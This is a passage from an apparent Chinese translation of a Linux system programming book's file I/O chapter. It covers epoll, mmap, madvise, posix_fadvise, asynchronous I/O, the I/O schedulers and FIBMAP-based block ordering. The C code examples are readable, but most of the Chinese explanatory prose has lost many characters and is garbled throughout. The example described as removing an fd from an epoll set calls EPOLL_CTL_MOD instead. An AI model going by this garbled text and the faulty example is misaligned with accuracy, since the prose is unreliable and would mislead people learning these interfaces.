的 Linux 的实 Linux readv() writev() 作调
实内散布 / 聚集 I/O。实上内的 I/O I/O
read() write() 的 I/O段。
– 95 –
4
文件 I/O
4.2 Event Poll 接口
poll() select() 的 2.6 内∗ event poll(epoll) 。然
实 epoll 们的性能
新的性。
poll() select()() 调时的文件。内
的文件。时 — 上
上文件时 — 调时的的。
epoll 实离出。
调 epoll 上文上文或的文件
真的件 (event wait)。
4.2.1 创建一个新的 epoll 实例
epoll create() epoll 上文
#include <sys/epoll.h>
int epoll_create (int size)
调 epoll create() epoll 实实的文件
。文件真的文件调
epoll 的。 size 内的文件
。的性能的提给出的。出
时 -1设 errno
EINVAL
size 。
ENFILE
文件的上。
ENOMEN 的内存操作。
的调
int epfd;
epfd = epoll_create (100); /* plan to watch ˜100
fds */
if (epfd < 0)
∗epoll 2.5.44 内的 2.5.66
– 96 –
4
文件 I/O
perror (”epoll_create”);
epoll create() 的文件调 close() 。
4.2.2 控制 epoll
epoll ctl() 以的 epoll 上文或文件
#include <sys/epoll.h>
int epoll_ctl (int epfd, int op, int fd, struct
epoll_event *event);
文件 <sys/epoll.h> epoll event
struct epoll_event {
__u32 events; /* events */
union {
void *ptr;
int fd;
__u32 u32;
__u64 u64;
} data;
};
epoll ctl() 调将 epoll 实 epfd。 op 对 fd 进的操
作。 event epoll 更的。
以 op 的效:
EPOLL CTL ADD fd 的文件 epfd 的 epoll 实集
event 的件。
EPOLL CTL DEL
fd 的文件 epfd 的 epoll 集。
EPOLL CTL MOD event fd 上的。
epoll events 的 events 出给文件上的
件。件以或同时。以效
EPOLLERR
文件出。即设件的。
– 97 –
4
文件 I/O
EPOLLET
文件上。 (”
件”)。。
EPOLLHUP
文件。即设件的。
EPOLLIN
文件读。
EPOLLONESHOT 件处理文件。
EPOLL CTL MOD 新的件以新文件。
EPOLLOUT
文件写。
EPOLLPRI
的读。
event poll 的 data 段。件 data 给
。将 event.data.fd 设 fd以文件件。
epoll ctl() 0。 -1设 errno
EBADF
epfd 效 epoll 实或 fd 效文件。
EEXIST
op EPOLL CTL ADD fd epfd 。
EINVAL
epfd epoll 实 epfd fd 相同或 op 效。
ENOENT op EPOLL CTL MOD或 EPOLL CTL DEL fd epfd
。
ENOMEN 内存进程的。
EPERM
fd epoll。
epfd 实 fd 的文件以
struct epoll_event event;
int ret;
event.data.fd = fd; /* return the fd to us later
*/
event.events = EPOLLIN | EPOLLOUT;
ret = epoll_ctl (epfd, EPOLL_CTL_ADD, fd, &event);
if (ret)
perror (”epoll_ctl”);
epfd 实的 fd 上的件以
struct epoll_event event;
– 98 –
4
文件 I/O
int ret;
event.data.fd = fd; /* return the fd to us
later */
event.events = EPOLLIN;
ret = epoll_ctl (epfd, EPOLL_CTL_MOD, fd,
&event);
if (ret)
perror (”epoll_ctl”);
相的 epfd fd 上的件以
struct epoll_event event;
int ret;
event.data.fd = fd; /* return the fd to us later
*/
event.events = EPOLLIN;
ret = epoll_ctl (epfd, EPOLL_CTL_MOD, fd, &event);
if (ret)
perror (”epoll_ctl”);
的 op EPOLL CTL DEL 时设件 event
以 NULL。 2.6.9 以的内空。
内效的 non-NULL 2.6.9
bug。
4.2.3 等待 Epoll 事件
epoll wait() 给 epoll 实的文件上的件
#include <sys/epoll.h>
int epoll_wait (int epfd, struct epoll_event
*events, int maxevents, int timeout);
对 epoll wait() 的调 epoll 实 epfd 的文件 fd 上的件时
timeout 。 events epoll event (
件) 的内存以 maxevents 件。件出
– 99 –
4
文件 I/O
-1将 errno 设以
EBADF
epfd 效文件。
EFAULT 进程对 events 的内存写。
EINTR
调。
EINVAL epfd 效 epoll 实或 maxevents 小 0。
timeout 0即件调即时调
0。 timeout -1调将件。
调 epoll event 的 events 段的件。 data
段调 epoll ctl() 的设。
的 epoll wait() 子
#define MAX_EVENTS
64
struct epoll_event *events;
int nr_events, i, epfd;
events = malloc (sizeof (struct epoll_event) *
MAX_EVENTS);
if (!events) {
perror (”malloc”);
return 1;
}
nr_events = epoll_wait (epfd, events, MAX_EVENTS,
-1);
if (nr_events < 0) {
perror (”epoll_wait”);
free (events);
return 1;
}
for (i = 0; i < nr_events; i++) {
printf (”event=%ld on fd=%d\n”,
events[i].events, events[i].data.fd);
/*
* We now can, per events[i].events, operate on
– 100 –
4
文件 I/O
* events[i].data.fd without blocking.
*/
}
free (events);
我们将 malloc() free()。
4.2.4 边沿触发事件和水平触发事件
epoll ctl() 的 event 的 events 设 EPOLLE fd 上的
相的。的 unix
时的。
1. 写 1kb 。
2. 上调 epoll wait() pipe 出读。
对的步 2 对 epoll wait() 的调将即以
pipe 读。对的调步 1 。
即调 epoll wait() 时读调然写
。
。 poll() select() 的
的。同的方式写程 I/O
EAGAIN。
自工程。时
。的时。
时。件时。
4.3 存储映射
文件 I/O内提 I/O 方式
程将文件映射内存即内存文件对的。程以
内存文件操作内存的以写内存
然的映射将文件写。
Linux 实 POSIX.1 的 mmpap() 调调将对映射内
存。我们 mmap() I/O 将文件映射内存的能; 我们
将调的。
– 101 –
4
文件 I/O
4.3.1 mmap()
mmap() 调内将 fd 示的文件 offset 处的 len
映射内存。 addr addr 内存的。
存 prot flags 的操作。
#include <sys/mman.h>
void * mmap (void *addr, size_t len, int prot,
int flags, int fd, off_t offset);
addr 内映射文件的。提示
0。调内存映射的。
prot 对内存的。 PROT NONE时
映射(以以的的或
PROT READ
页读。
PROT WRITE 页写。
PROT EXEC
页。
的存能文件的式。程以
读方式文件 prot 能设 PROT WRITE。
性
POSIX (读写
的子集。实对处理读。
处理能读。操作上 PROT READ 即
PROT EXEC。 x86 的。
然的处理方式程。的程们
映射的时相的设 PROT EXEC。
出的原即映射
操作处理映射的。
x86 处理 NX(no-execute读的
映射。新的上 PROT READ 同 PROT EXEC。
flag 映射的。以进或的
– 102 –
4
文件 I/O
MAP FIXED
mmap() addr 作性。内
映射文件调。的
内存映射的原内然
新内。进程的空间
以。
MAP PRIVATE 映射。文件映射写时进程对内存的何
真的文件或进程的映射。
MAP SHARED 映射文件的进程映射内存。对内存的写操
作效写文件。读映射进程的写操作的
。
MAP SHARED MAP PRIVATE 能同时。更
的将 8 。
映射文件的时。映
射文件文件的进程然以文件。映射或进程
时对的文件 1。
的示以读方式映射 fd 的文件
len
void *p;
p = mmap (0, len, PROT_READ, MAP_SHARED, fd, 0);
if (p == MAP_FAILED)
perror (”mmap”);
4-1 示 mmap() 的对文件进程空间映射的。
4.3.1.1 页大小
页内存同的小单。页内存映射的
同时进程空间的。
mmap() 调操作页。 addr offset 页小对。
们页小的。
以映射的页。 len 能页对(能
映射的文件小页小的映射空页。出
的内存即效映射的 0 . 的读
– 103 –
4
文件 I/O
4-1 映射文件进程空间
操作将 0。即 MAP SHARED 进写操作文
件。 len 写文件。
sysconf(): POSIX 的页小方 sysconf()将
的
#include <unistd.h>
long sysconf (int name);
调 sysconf() name 的 name 效 -1。出时 errno
设 EINVAL。 -1 对能效( limits -1 示
。的调空 errno调。
POSIX SC PAGESIZE(SC PAGE SIZE 同小页
的小。页小
long page_size = sysconf (_SC_PAGESIZE);
getpagesize():Linux 提 getpagesize() 页小
#include <unistd.h>
int getpagesize (void);
– 104 –
4
文件 I/O
调 getpagesize() 将页的小。 sysconf() 单
int page_size = getpagesize ( );
unix POSIX 1003.1-2001
出性。
页小:页小 <asm/pages.h> 的 PAGE SIZE 。
页小的方
int page_size= PAGE_SIZE ;
同方方时页小时。
同页小同的页
小。进文件能给的上即
处。页小能性. 时
页的小。 addr offset 0设。
的内能将出空间。我们提
Unix 自程。
sysconf() 的。
4.3.1.2 返回值和错误码
调 mmap() 映射的。时 MAP FAILED设
相的 errno。 mmap() 0。
能的 errno
EACESS
给的文件文件或式 prot 或
flags 。
EAGAIN
文件文件。
EBADF
给文件效。
EINVAL
addr len off 的或效。
ENFILE
文件上。
ENODEV
文件的文件存映射。
ENOMEM
的内存。
EOVERFLOW addr + len 的超空间小。
EPERM
设 PROT EXEC文件以方式。
– 105 –
4
文件 I/O
4.3.1.3 相关信号
映射相的
SIGBUS
进程效的映射时。文
件映射。
SIGSEGV 进程写读的映射时。
4.3.2 munmap()
Linux 提 munmap() mmap() 的映射。
#include <sys/mman.h>
int munmap (void *addr, size_t len);
munmap() 进程空间 addr len 的内存的页
的映射。映射时的内存效将
SIGSEGV 。
munmap() 的上 mmap() 调的 len。
调 0 -1 errno 设相的。的 errno
EINVAL或效。
作实段内存 [addr, addr + len] 间内页的映
射。
if (munmap (addr, len) == -1)
perror (”munmap”);
4.3.3 存储映射例子
我们子 mmap 将的文件出出
#include
<stdio.h>
#include
<sys/types.h>
#include
<sys/stat.h>
#include
<fcntl.h>
#include
<unistd.h>
#include
<sys/mman.h>
– 106 –
4
文件 I/O
int main (int argc, char *argv[])
{
struct stat sb;
off_t len;
char *p;
int fd;
if (argc < 2) {
fprintf (stderr, ”usage: %s <file>\n”,
argv[0]);
return 1;
}
fd = open (argv[1], O_RDONLY);
if (fd == -1) {
perror (”open”);
return 1;
}
if (fstat (fd, &sb) == -1) {
perror (”fstat”);
return 1;
}
if (!S_ISREG (sb.st_mode)) {
fprintf (stderr, ”%s is not a file\n”,
argv[1]);
return 1;
}
p = mmap (0, sb.st_size, PROT_READ,
MAP_SHARED, fd, 0);
if (p == MAP_FAILED) {
perror (”mmap”);
return 1;
}
if (close (fd) == -1) {
– 107 –
4
文件 I/O
perror (”close”);
return 1;
}
for (len = 0; len < sb.st_size; len++)
putchar (p[len]);
if (munmap (p, sb.st_size) == -1) {
perror (”munmap”);
return 1;
}
return 0;
}
的调 fstat()我们将。
fstat() 给文件的。 S ISREG() 以
我们以映射给文件文件(相对设备文件
。映射文件的文件设备。设备
以映射的以的映射设 errno EACCESS。
子的的文件作程。文
件文件映射文件出
映射。
4.3.4 mmap() 的优点
相对 read() write() mmap() 处理文件。
• read() 或 write() 调进读写
映射文件进操作以的。
• 的页读写映射文件调上文的
。操作内存单。
• 进程映射同对内存进程间。读写
的映射的写的进写时的页的。
• 映射对的操作。 lseek()。
以上理 mmap() 的。
– 108 –
4
文件 I/O
4.3.5 mmap() 的缺陷
mmap() 时以
• 映射的小页小的。映射文件小页小
的间空间。对小文件的空间。对 4kb
的页 7 的映射 4089 。
• 存映射进程空间内。对 32 的空间的
小异的映射的出的空内存。
64 空间。
• 映射以及相的内的。上提
的读写时的的以对文件的
文件更。
以上理处理文件(的空间小的或文件
小 page 小时(空间。
4.3.6 调整映射的大小
Linux 提 mremap() 扩或映射的小。 Linux
的
#define _GNU_SOURCE
#include <unistd.h>
#include <sys/mman.h>
void * mremap (void *addr, size_t old_size,
size_t new_size, unsigned long flags);
mremap() 将映射 [addr, addr + old size) 的小或 new size。
进程空间的小 flags内以同时映射。
[示。) 示
作间 (interval notation)。
flags 的以 0 或 MREMAP MAYMOVE
调的小内以映射
。内以映射的小调操作
能。
– 109 –
4
文件 I/O
4.3.6.1 返回值和错误码
调 mremap() 新 映 射 的 。
MAP FAILED设 errno 以
EAGAIN
内存能调小。
EFAULT
给内的页进程空间内的效页或新映
射给页时出。
EINVAL
效。
ENOMEM 给进扩展(MREMAP MAYMOVE
设或进程空间内空空间。
glibc mremap() 实效的 realloc()以调
malloc() 的内存。
void * realloc (void *addr, size_t len)
{
size_t old_size = look_up_mapping_size (addr);
void *p;
p = mremap (addr, old_size, len,
MREMAP_MAYMOVE);
if (p == MAP_FAILED)
return NULL;
return p;
}
段 malloc() 操作的映射时效即段
能作展示提性能的。子设程写
look up mapping size() 。 GNU C library mmap() 及相进
内存。我们将更的。
4.3.7 改变映射区域的权限
POSIX mprotect()程内存的
#include <sys/mman.h>
– 110 –
4
文件 I/O
int mprotect (const void *addr, size_t len, int
prot);
调 mprotect() [addr, addr + len) 内页的 addr 页对
的。 prot mmap() 的 prot 同的 PROT NONE PROT READ
PROT WRITE PROT EXEC。的读 prot 设
PROT WRITE调写。
上 mprotect() 能操作 mmap() 的。 Linux
mprotect() 以操作的内存。
4.3.7.1 返回值和错误码
调 mprotect() 0。 -1设 errno
EACCESS 内存能设 prot 的。将读的
文件的映射设写。
EINVAL
addr 效或页对。
ENOMEM 内空间满或内页进程
空间内的效。
4.3.8 使用映射机制同步文件
POSIX 提存映射 fsync() 的调
#include <sys/mman.h>
int msync (void *addr, size_t len, int flags);
调 msync() 以将 mmap() 的映射内存的何写
同步内存的映射映射的文件的的。文件或文件
子集内存的映射 addr 的 len 写。 addr
页对的上 mmap() 调的。
调 msync()映射的映射写
。 write() 同 write() 的存
写。写内存映射时进程内页存的文件页
内。内同步页存。
flag 同步操作的。的以的进或操作
– 111 –
4
文件 I/O
MS ASYNC
同步操作异步。更新操作调 msync()
即 write() 操作。
MS INVALIDATE 映射的将效。对文件
映射的操作将同步。
MS SYNC
同步操作同步进。 msync() 页写
。
MS ASYNC MS SYNC 能。
单
if (msync (addr, len, MS_ASYNC) == -1)
perror (”msync”);
子异步的将文件的映射 [addr, addr+len) 同步。
4.3.8.1 返回值和错误码
调 msync() 0。调 -1设 errno 相。以
errno 的效
EINVAL
flags 同时设 MS SYNC MS ASYNC设以上
的或页对。
ENOMEM 的 内 存 (或 映 射。 POSIX
Linux 同 步 映 射 的 内 存 时将
ENOMEM能同步效的。
2.4.29 的内 msync() EFAULT ENOMEM。
4.3.9 映射提示
Linux 提 madvise() 调以进程何映射上给内
的提示。内自的更的映射。内
调自的即提示时能的性
能的提示以的存的
读。
调示内何对 addr len 的内存映射进
操作。
– 112 –
4
文件 I/O
#include <sys/mman.h>
int madvise (void *addr, size_t len, int advice);
len 0内将对 addr 的映射提示。
advice 以
MADV NORMAL
对给的内存程提示方
式操作。
MADV RANDOM
程将以的页。
MADV SEQUENTIAL 程的
页。
MADV WILLNEED
程将的页。
MADV DONTNEED
程内内的页。
内提示真的的实相的 POSIX
提示的的。 2.6 内以方式进处理
MADV NORMAL
内进程的读。
MADV RANDOM
内读理读操作读小的。
MADV SEQUENTIAL 内读。
MADV WILLNEED
内将给的页读内存。
MADV DONTNEED
内给页相的
的同步写的页。对映射
新内存。
:
int ret;
ret = madvise (addr, len, MADV_SEQUENTIAL);
if (ret < 0)
perror (”madvise”);
调内进程内存 [addr, addr + len)。
– 113 –
4
文件 I/O
读
Linux 内上的文件时周的读 (reada-
head) 自的操作。文件的内时内
读内的。对的(
文件时内以上。 (自读
)文件布的的的。
读处的的效读的程。的
读文件时效对读的。
我们的内内的内的调
读以读的率。率
的读提示小的读。程以
madvise() 调读的小。
4.3.9.1 返回值和错误码
调 madvise() 0时 -1设 errno 相。以
效
EAGAIN
内内 (能内存) 进程以。
EBADF
存映射文件。
EINVAL
len 的 addr 页对的 advice 效或页
或以 MADV DONTNEED 方式.
EIO
MADV WILLNEED 操作时的内 I/O 。
ENOMEM 给 的 进 程 空 间 的 效 映 射或 设
MADV WILLNEED内存。
4.4 普通文件 I/O 提示
上小我们何给内提存映射的操作提示。我
们将文件 I/O 时何给内提操作提示。 Linux 提满
的 posix fadvise() readahead()。
4.4.1 posix fadvise()
的 POSIX 1003.1-2003
– 114 –
4
文件 I/O
#include <fcntl.h>
int posix_fadvise (int fd, off_t offset, off_t
len, int advice);
调 posix fadvise() 给出内文件 fd 的 [offset, offset + len) 内操作
提示。 len 0提示作间 [offset, length of file]。设
len offset 0设文件。
advice 的 madvise() 。的以的:
POSIXFADV NORMAL
程 给 文 件 的 给
处理。
POSIX FADV RANDOM
程给内。
POSIX FADV SEQUENTIAL 程给内
。
POSIX FADV WILLNEED
程能。
POSIX FADV NOREUSE
程能给
。
POSIX FADV DONTNEED
程能给。
madvise() 内对提示的处理同的实
同的 Linux 内的处理方式相同。内的处理方式:
POSIX FADV NORMAL
内的读。
POSIX FADV RANDOM
内读理读操作能的读
的。
POSIX FADV SEQUENTIAL 内读读读的。
POSIX FADV WILLNEED
内读将页读内存。
POSIX FADV NOREUSE
POSIX FADV WILLNEED ;
内能将” ” 的
。 madvise 对的。
POSIX FADV DONTNEED
内存的。同
madvise() 对。
以段内、的 fd 的文件
int ret;
– 115 –
4
文件 I/O
ret = posix_fadvise (fd, 0, 0, POSIX_FADV_RANDOM);
if (ret == -1)
perror (”posix_fadvise”);
4.4.1.1 返回值和错误码
调 0 -1设 errno
EBADF
文件效。
EINVAL advice 效文件或设给
的文件。
4.4.2 readahead() 系统调用
posix fadvise() 2.6 内新的调。 readahead()
以 posix fadvise() POSIX FADV WILLNEED 时同的能。
同 posix fadvise() 的 readahead() Linux 的
#include <fcntl.h>
ssize_t readahead (int fd, off64_t offset, size_t
count);
readahead() 调将读 fd 示文件的 [offset, offset + count) 页存
。
4.4.2.1 返回值和错误码
调 0 -1设 errno
EBADF
文件效
EINVAL 文件对的文件读。
4.4.3 “经济实用“的操作提示
内操作提示的效率以提。
对的 I/O 。处理的
的提示的上的提的。
读 文 件 的 内 时进 程 以 设
POSIX FADV WILLNEED 内文件读页存。 I/O 操作将
– 116 –
4
文件 I/O
异步进。文件时操作以即
。
相的读或写 (上的)进程
以设 POSIX FADV DONTNEED 内存的内。的操
作满页。进程页
的空间存的。对
的的将存。
进 程 读 文 件 时设 POSIX FADV SEQUENTIAL
内 读。相 的 进 程 自 将 文 件设
POSIX FADV RANDOM内读的。
4.5 同 步 (Synchronized),同 步 (Synchronous) 及 异 步 ( Asyn-
chronous) 操作
: synchronized synchronous 同 步
我们对同步的相的文原文。
Unix 操作同步 (synchronized)同步 (nonsynchronized)同
步 (synchronous)异步 (asynchronous) 时的
( synchronized synchronous 间的小)。
同步 (synchronous) 写操作写内的。同
步(synchronous读操作写程空间的
的。相的异步 (asynchronous写操作空间时能
; 异步(asynchronous) 读操作备能。操
作操作以进。然的
操作以及的程。
同步的 (synchronized) 操作同步 (synchronous) 操作的更
更。同步的(synchronized写操作写上的
内的同步的。同步 (synchronized) 的读操作新的 (
能读)。
的同步(synchronous异步(asynchronous I/O 操作
件 (的存) 。同步 (synchronized) 异
步(asynchronized件 (写)。
– 117 –
4
文件 I/O
Unix
的
写
操
作
同
步
(synchronous)
同
步
的(nonsynchronized读操作同步 (synchronous) 同步的 (synchronized)。∗
对写操作上性的能的 4-1 示。
4-1 写操作的同步性
Synchronized
Nonsynchronized
Synchronous
写操作写
。文件时
O SYNC
方式。
写操作存内
。的
。
Asynchronous
写 操 作
。 操 作
写。
写 操 作
。 操 作
写内
。
读读操作同步的(synchronized。的
操作以同步(synchronous的以异步(asynchronous的
4-2 示。
4-2 读操作的同步性
Synchronized
Synchronous
读操作新存提的。(
的。
Asynchronous
读操作。操作
新。
我们何写操作进同步 (synchronized)(设 O SYNC
) 何 I/O 操 作 同 步 的(synchronized( fsync()
friends。我们何读写(asynchronous异步。
4.5.1 异步 I/O
异步 (asynchronous)I/O 内的。 POSIX 1003.1-2003
aio 的 Linux 实 aio。 aio 提实异步
I/O 提以及时。
#include <aio.h>
/* asynchronous I/O control block */
∗读操作写操作异步的 (nonsynchronized)内页
新的。页的上的新。
实上的操作同步的。的方式。
– 118 –
4
文件 I/O
struct aiocb {
int aio_filedes;
/* file
descriptor */
int aio_lio_opcode;
/* operation to
perform */
int aio_reqprio;
/* request
priority offset */
volatile void *aio_buf;
/* pointer to
buffer */
size_t aio_nbytes;
/* length of
operation */
struct sigevent aio_sigevent;
/* signal number
and value */
/* internal, private members follow... */
};
int aio_read (struct aiocb *aiocbp);
int aio_write (struct aiocb *aiocbp);
int aio_error (const struct aiocb *aiocbp);
int aio_return (struct aiocb *aiocbp);
int aio_cancel (int fd, struct aiocb *aiocbp);
int aio_fsync (int op, struct aiocb *aiocbp);
int aio_suspend (const struct aiocb * const
cblist[], int n, const struct timespec
*timeout);
4.5.1.1 基于线程的异步 I/O
Linux O DIRECT 的文件上的 aio。设
O DIRECT 的文件上 aio我们自实。内的
我们能实异步 I/O实相的效。
我们将程的异步 I/O
• 实 I/O
• 离内的 I/O I/O 提操作时。
– 119 –
4
文件 I/O
性能的。 I/O 操作出 I/O 超
的进程 I/O 。程的
处理 I/O 的方式。
的的方式程 (调将)。方
:
1. 程处理的 I/O。
2. 实将 I/O 操作工作的。
3. 的 I/O 相的 I/O 操作。工作
程的 I/O 提内们。
4. 操作的 (读的)
。
5. 实的的 I/O
操作。
POSIX 的 aio 的相的程理的
。
4.6 I/O 调度器和 I/O 性能
的性能。
性能的 seek 操作的时程的
。操作以处理周 ( 1/3 ) 的
时单的 seek 操作 8 的时间
cpu 周的 2500 。
的性能我们 I/O 操作
们将原效的。操作内实 I/O
调理 I/O 的离小。
I/O 调将的性能小。
4.6.1 磁盘寻址
理 I/O 调的工作。
(cylinders) (heads) (section) 何方式方
式 CHS 。
、读写。以作 CD上
– 120 –
4
文件 I/O
作 CD。的 CD 上。
。
单上的程:
。上。
上。上离
相同离的。的 (即的)。
单上的单。然上的
。。然
读写的上的的读写。
的操作的、。
将 / / 的映射的 (理或设备
)更的映射的。操作以 (即
(LBA)程的 CHS ∗。
自然的 CHS 的映射的: 理 n n + 1 理上相的。
我们将的映射的。
文件存件。们操作自的操作单即 (时
作文件或)。的小理小的。
文件的映射或理。
4.6.2 调度器的功能
I/O 调实操作 (merging) (sorting)。 (merg-
ing) 操作将或相的 I/O 的程。
读 5 读 6 7 上的。对 5 7
的操作。的 I/O 能 I/O 的。
(sorting) 操作相对更的的
新的 I/O 。 I/O 操作 52 109 7 I/O 调
以 7 52 109 的进. 81
将 52 109 的间。 I/O 调然们的
调:7然 52然 81 109。
方式的离小。的 (
的进)以、性的方式。 I/O 操作
∗绝对上程上上的
– 121 –
4
文件 I/O
的进操作以 I/O 性能提。
4.6.3 改进读请求
读新的。的页存
时读读出能相的操
作。我们将性能读 (read latency)。
的程能时 I/O 。进同
步的将。我们读的文
件。程文件读然读段
文件读。然进程读文件。的
进的: 以。
写 (同步的) 的对写时间内
何 I/O 操作。空间程写操作性能的。写
操作读操作的时: 写操作的们
以内的。的 writes-starving-reads 。
I/O 调以的对能的对
的。我们的子。新的
50-60 间的 109 的将调。读的
能性能。以 I/O 调” ” 的
。
单的方 2.4 内 Linux 调∗方
的的新的。上以
对读的时读 (read latency)。
方单。 2.6 内 Linus 调
新的调。
4.6.3.1 Deadline I/O 调度器
Deadline I/O 调 2.4 调程及的调的
。 Linus 的 I/O 。的 I/O
调的。 Deadline I/O 调进步进原
的调新的: 读 FIFO 写 FIFO 。的
∗Linus 以自的调。的
以。
– 122 –
4
文件 I/O
提时间。读 FIFO 读同写 FIFO
写。 FIFO 的设时间。读 FIFO
的时间设 500 。写 5 。
新的 I/O 提然相
(读或写) 的。的 I/O 。
的 (linus 调)以小
。
FIFO 的超出的时间时 I/O 调
I/O 调调 FIFO 的。 I/O 调程
处理的时间的。
方式 Deadline I/O 调 I/O 上。然能
时间调 I/O 时间调。
Deadline I/O 调能提的的
时间。读更小的时间 writes-starving-reads 的
。
4.6.3.2 Anticipatory I/O 调度器
Deadline I/O 调。我们读
的。 Deadline I/O 调时读的的
时间或上时将然 I/O 调程处理
I/O 。时。设然提读
的即将时间 I/O 调的
然处理。的能
件能的。小时的
处理读上以的。能
读处理的性能将的
提。的程调提的读 I/O 调
。
对的读时然出 – 读
程备提读时
I/O 调程处理的。时进
的操作: 读。存方 I/O 调对
– 123 –
4
文件 I/O
同的将提以的读
进。的时间的的。
anticipatory I/O 调的工作原理的。 Deadlne
。读操作提 anticipatory I/O 调的
调。同 Deadline I/O 调的 anticipatory I/O 调
6 。程 6 内对同出读读
anticipatory I/O 调。 6 内读
anticipatory I/O 调然进操作 (处理
的)。的以的时间 (
时间的处理)。读相的
时间。
4.6.3.3 CFQ I/O 调度器
方上 Complete Fair Queuing(CFQ)I/O 调上调
程的相同的。∗ CFQ 时进程自的
时间。 I/O 调程方式处理的
的时间或的处理。 CFQ I/O 调将空
段时间( 10 新的。 I/O 调
操作。效调程处理进程的。
进程的同步(synchronized 的 (读操作)
同步更的。 CFQ 更进读操作
writes-starving-reads 。进程设 CFQ 调对进程
的同时提的性能。
CFQ 调的的。
4.6.3.4 Noop I/O 调度器
Noop I/O 调程单的调。进
操作单的。对的设备上。
∗的文实的 CFQ I/O 调。的原时间或式
以的方式工作。
– 124 –
4
文件 I/O
4.6.4 选择和配置你的 I/O 调度器
的 I/O 调以时以内 iosched 。效
的 as cfq deadline noop。以时对设备进
以 /sys/block/device/queue/scheduler 。读文件以
的 I/O 调上效写文件以更 I/O 调程
。设设备 hda 的 I/O 调程 CFQ以方式
#echo cfq >/sys/block/hda/queue/scheduler
/sys/block/device/queue/iosched 理以设的 I/O 调
相的。 I/O 调。何设 root 。
的程写的程及的 I/O 子。对的
写出更的。
4.6.5 优化 I/O 性能
I/O 相同时 I/O
的 I/O 性能的。
I/O 操作的 (将小的操作聚集的操作)实
对的 I/O或空间 () I/O 的
I/O I/O() 异步 I/O程程的
步。
I/O 操作的程以的性
能。同的即 Linux 内 I/O 调
空间的程以方式实更的性能提。
4.6.5.1 用户空间 I/O 调度
进 I/O 调的 I/O 集的以 Linux I/O 调
的方对的 I/O 进进更的性能提。∗
然 I/O 调将将以
性的方式程? 设提
∗能将 I/O 操作的或上。 I/O 的程 (设
的) 对 I/O 操作进。
– 125 –
4
文件 I/O
的 I/O 。以进 I/O 调的。 I/O 调
对进提
时程提 I/O 。 I/O 调程能的小
的。然
的能的的。
程能布
的提对们提给 I/O 调将
的性能提。
对同的空间的程内同的。 I/O
调的以理的式进。对理进
的。空间以文件文件的式存的。
程文件的布的。
I/O 能以操作的提空间程以
同的处理。们以方式进
1.
2. inode
3. 文件的理
程上的。我们。
。单的效率的的方。
文件的布的文件(同的
子上相布。同的文件间
的时间内相的率更。
文件上的理布。同的
文件然文件同的文件更的率布。
方文件的文件
的作小。即能实的理
。的对文件的。文
件布上的程空间性示。
方实。
inode 。 inode Unix 文件相的的。
文件能理 inode文件小
。我们将 7 更的 inode。:
– 126 –
4
文件 I/O
文件 inode inode 。
inode 更效
文件 i 的 inode < 文件 j 的 inode
文件 i 的理 < 文件 j 的理
对 Unix 的文件 ( ext2 ext3) 的。对真
实的文件何能的 inode (映射)
的。对实上 inode 的文件存能
性。 inode(何映射) 的方。
我们以 stat() 调 inode 更的方我们将
。 I/O 的文件的 inode 然以 inode 的
方式对进。
以示程以出给文件的 inode
#include
<stdio.h>
#include
<stdlib.h>
#include
<fcntl.h>
#include
<sys/types.h>
#include
<sys/stat.h>
/*
* get_inode - returns the inode of the file
associated
* with the given file descriptor, or -1 on
failure
*/
int get_inode (int fd)
{
struct stat buf;
int ret;
ret = fstat (fd, &buf);
– 127 –
4
文件 I/O
if (ret < 0) {
perror (”fstat”);
return -1;
}
return buf.st_ino;
}
int main (int argc, char *argv[])
{
int fd, inode;
if (argc < 2) {
fprintf (stderr, ”usage: %s <file>\n”,
argv[0]);
return 1;
}
fd = open (argv[1], O_RDONLY);
if (fd < 0) {
perror (”open”);
return 1;
}
inode = get_inode (fd);
printf (”%d\n”, inode);
return 0;
}
get inode() 以的的程。
inode : inode 文件的
理布。的的程程
Unix 上。何 inode 进空间 I/O
调的方。
理。理进的方设自的
。的文件小的单文件
。的小文件; 对理。以我
们以文件们对的理上进
– 128 –
4
文件 I/O
。
内提文件理的方。 ioctl() 调
FIBMAP 我们将提
ret = ioctl (fd, FIBMAP, &block);
if (ret < 0)
perror (”ioctl”);
fd 文件的文件 block 我们理
的。调 block 理。 0
文件相。文件 8 效 0 7。
理的映射步。步文件的。
以 stat() 调。对我们 ioctl() 调
相的理。
以示程对的文件进相操作
#include
<stdio.h>
#include
<stdlib.h>
#include
<fcntl.h>
#include
<sys/types.h>
#include
<sys/stat.h>
#include
<sys/ioctl.h>
#include
<linux/fs.h>
/*
* get_block - for the file associated with the
given fd, returns
* the physical block mapping to logical_block
*/
int get_block (int fd, int logical_block)
{
int ret;
ret = ioctl (fd, FIBMAP, &logical_block);
if (ret < 0) {
– 129 –
4
文件 I/O
perror (”ioctl”);
return -1;
}
return logical_block;
}
/*
* get_nr_blocks - returns the number of logical
blocks
* consumed by the file associated with fd
*/
int get_nr_blocks (int fd)
{
struct stat buf;
int ret;
ret = fstat (fd, &buf);
if (ret < 0) {
perror (”fstat”);
return -1;
}
return buf.st_blocks;
}
/*
* print_blocks - for each logical block consumed
by the file
* associated with fd, prints to standard out the
tuple
* ”(logical block, physical block)”
*/
void print_blocks (int fd)
{
int nr_blocks, i;
nr_blocks = get_nr_blocks (fd);
– 130 –
4
文件 I/O
if (nr_blocks < 0) {
fprintf (stderr, ”get_nr_blocks failed!\n”);
return;
}
if (nr_blocks == 0) {
printf (”no allocated blocks\n”);
return;
} else if (nr_blocks == 1)
printf (”1 block\n\n”);
else
printf (”%d blocks\n\n”, nr_blocks);
for (i = 0; i < nr_blocks; i++) {
int phys_block;
phys_block = get_block (fd, i);
if (phys_block < 0) {
fprintf (stderr, ”get_block failed!\n”);
return;
}
if (!phys_block)
continue;
printf (”(%u, %u) ”, i, phys_block);
}
putchar (’\n’);
}
int main (int argc, char *argv[])
{
int fd;
if (argc < 2) {
fprintf (stderr, ”usage: %s <file>\n”,
argv[0]);
return 1;
}
– 131 –
4
文件 I/O
fd = open (argv[1], O_RDONLY);
if (fd < 0) {
perror (”open”);
return 1;
}
print_blocks (fd);
return 0;
}
文件的以 (的) 我们的
I/O 给文件的。以
get nr blocks() 的我们的程以 get block(fd, 0) 的进
。
FIBMAP 的 CAP SYS RAWIO 的 能 root 。
以 root 的程方。更进步 FIBMAP
的的实文件的。的文件 ext2 ext3
能的文件。 FIBMAP ioctl()
EINVAL。
方处文件的真实理真
的。即对同文件的 I/O (内 I/O 调
的 I/O 的)方。
的 root 对实的。
4.7 结论
以上的内我们 Linux 上文件 I/O 的方方。
我们的 Linux 文件 I/O 程(实上 Unix 程的
read() write(0, open(), close() 。我们空间的
